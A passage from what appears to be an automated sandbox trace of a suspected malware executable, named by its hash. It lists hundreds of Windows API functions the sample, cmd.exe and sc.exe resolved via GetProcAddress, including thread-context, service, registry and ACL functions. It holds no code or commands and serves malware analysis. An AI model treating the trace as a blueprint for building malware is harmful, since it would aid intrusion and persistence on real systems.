\"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter _allmul (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter SHGetInstanceExplorer (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockShared (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockShared (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter OleUninitialize (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005796)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005856)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005856)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006140)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006140)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter 